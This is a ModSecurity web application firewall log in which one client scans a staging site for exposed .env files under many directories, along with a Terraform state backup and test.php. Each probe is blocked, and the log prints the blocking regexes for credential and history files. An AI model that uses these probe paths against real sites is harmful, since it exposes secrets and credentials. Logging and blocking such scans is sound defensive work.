[Tue May 26 15:31:09.146273 2026] [security2:error] [pid 715645:tid 715894] [client 195.178.110.199:56060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWxwAAAHc"]
[Tue May 26 15:31:09.178383 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgWywAAADI"]
[Tue May 26 15:31:09.217635 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:55952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/shared/.env"] [unique_id "ahVvZXVGgMGh8k213RgW1AAAAGg"]
[Tue May 26 15:31:09.237789 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW0AAAAGU"]
[Tue May 26 15:31:09.257705 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW0wAAAG4"]
[Tue May 26 15:31:09.265602 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW2gAAAFM"]
[Tue May 26 15:31:09.269537 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW1wAAABg"]
[Tue May 26 15:31:09.279923 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:56030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/src/.env"] [unique_id "ahVvZXVGgMGh8k213RgW2wAAAGc"]
[Tue May 26 15:31:09.336478 2026] [security2:error] [pid 715645:tid 715798] [client 195.178.110.199:56060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW3AAAABc"]
[Tue May 26 15:31:09.341813 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:56004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/shop/.env"] [unique_id "ahVvZXVGgMGh8k213RgW3gAAAH8"]
[Tue May 26 15:31:09.377594 2026] [security2:error] [pid 715645:tid 715824] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW3QAAADE"]
[Tue May 26 15:31:09.392408 2026] [security2:error] [pid 715645:tid 715818] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW4QAAACs"]
[Tue May 26 15:31:09.449762 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW5QAAABM"]
[Tue May 26 15:31:09.461481 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:56044] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW6gAAAGQ"]
[Tue May 26 15:31:09.471556 2026] [security2:error] [pid 715645:tid 715793] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW6wAAABI"]
[Tue May 26 15:31:09.475281 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW7AAAAAs"]
[Tue May 26 15:31:09.492898 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stage/.env"] [unique_id "ahVvZXVGgMGh8k213RgW8gAAADg"]
[Tue May 26 15:31:09.499999 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:56014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW7QAAAHU"]
[Tue May 26 15:31:09.510567 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:41680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW7wAAAEU"]
[Tue May 26 15:31:09.513803 2026] [security2:error] [pid 715645:tid 715782] [client 195.178.110.199:41818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW7gAAAAc"]
[Tue May 26 15:31:09.514665 2026] [security2:error] [pid 715645:tid 715802] [client 195.178.110.199:56088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW8AAAABs"]
[Tue May 26 15:31:09.524647 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/staging/.env"] [unique_id "ahVvZXVGgMGh8k213RgW8wAAADA"]
[Tue May 26 15:31:09.529616 2026] [security2:error] [pid 715645:tid 715896] [client 195.178.110.199:56060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW8QAAAHk"]
[Tue May 26 15:31:09.569504 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:56030] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW9AAAAG8"]
[Tue May 26 15:31:09.573455 2026] [security2:error] [pid 715645:tid 715783] [client 195.178.110.199:56004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW9QAAAAg"]
[Tue May 26 15:31:09.617739 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW9gAAAAQ"]
[Tue May 26 15:31:09.656165 2026] [security2:error] [pid 715645:tid 715809] [client 195.178.110.199:41680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stg/.env"] [unique_id "ahVvZXVGgMGh8k213RgW-wAAACI"]
[Tue May 26 15:31:09.666381 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:55942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW-gAAAEA"]
[Tue May 26 15:31:09.702280 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/srv/.env"] [unique_id "ahVvZXVGgMGh8k213RgW_wAAAD8"]
[Tue May 26 15:31:09.723275 2026] [security2:error] [pid 715645:tid 715895] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgW_gAAAHg"]
[Tue May 26 15:31:09.751274 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:41810] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXAAAAAFE"]
[Tue May 26 15:31:09.759831 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:56088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXAQAAACQ"]
[Tue May 26 15:31:09.810223 2026] [security2:error] [pid 715645:tid 715814] [client 195.178.110.199:55968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXBQAAACc"]
[Tue May 26 15:31:09.815649 2026] [security2:error] [pid 715645:tid 715810] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXBAAAACM"]
[Tue May 26 15:31:09.816455 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:56014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXBgAAABQ"]
[Tue May 26 15:31:09.830974 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXBwAAAEM"]
[Tue May 26 15:31:09.846064 2026] [security2:error] [pid 715645:tid 715867] [client 195.178.110.199:55952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stripe/.env"] [unique_id "ahVvZXVGgMGh8k213RgXDgAAAFw"]
[Tue May 26 15:31:09.847254 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXCgAAABU"]
[Tue May 26 15:31:09.888427 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:56004] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXDwAAAHE"]
[Tue May 26 15:31:09.903586 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXEgAAAFQ"]
[Tue May 26 15:31:09.922832 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXFQAAAFI"]
[Tue May 26 15:31:09.932820 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXGAAAAGw"]
[Tue May 26 15:31:09.987061 2026] [security2:error] [pid 715645:tid 715899] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVvZXVGgMGh8k213RgXIAAAAHw"]
[Tue May 26 15:31:09.997176 2026] [security2:error] [pid 715645:tid 715876] [client 195.178.110.199:55942] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXGgAAAGU"]
[Tue May 26 15:31:10.025134 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXHgAAAG4"]
[Tue May 26 15:31:10.038367 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZXVGgMGh8k213RgXIwAAADQ"]
[Tue May 26 15:31:10.053041 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:41636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v1/.env"] [unique_id "ahVvZnVGgMGh8k213RgXLQAAAGo"]
[Tue May 26 15:31:10.058396 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXJgAAABg"]
[Tue May 26 15:31:10.079143 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXKQAAAHA"]
[Tue May 26 15:31:10.088990 2026] [security2:error] [pid 715645:tid 715843] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXLAAAAEQ"]
[Tue May 26 15:31:10.095851 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:55968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/test/.env"] [unique_id "ahVvZnVGgMGh8k213RgXLgAAAGA"]
[Tue May 26 15:31:10.098952 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:41810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/test.php"] [unique_id "ahVvZnVGgMGh8k213RgXLwAAAHY"]
[Tue May 26 15:31:10.133276 2026] [security2:error] [pid 715645:tid 715786] [client 195.178.110.199:41726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v3/.env"] [unique_id "ahVvZnVGgMGh8k213RgXOAAAAAs"]
[Tue May 26 15:31:10.158209 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXMgAAADs"]
[Tue May 26 15:31:10.166755 2026] [security2:error] [pid 715645:tid 715846] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXNQAAAEc"]
[Tue May 26 15:31:10.169288 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:41818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/user/.env"] [unique_id "ahVvZnVGgMGh8k213RgXPQAAADg"]
[Tue May 26 15:31:10.226175 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:56044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v2/.env"] [unique_id "ahVvZnVGgMGh8k213RgXQQAAAG8"]
[Tue May 26 15:31:10.264810 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXQAAAADA"]
[Tue May 26 15:31:10.294254 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXRAAAAAQ"]
[Tue May 26 15:31:10.323826 2026] [security2:error] [pid 715645:tid 715868] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvZnVGgMGh8k213RgXRQAAAF0"]
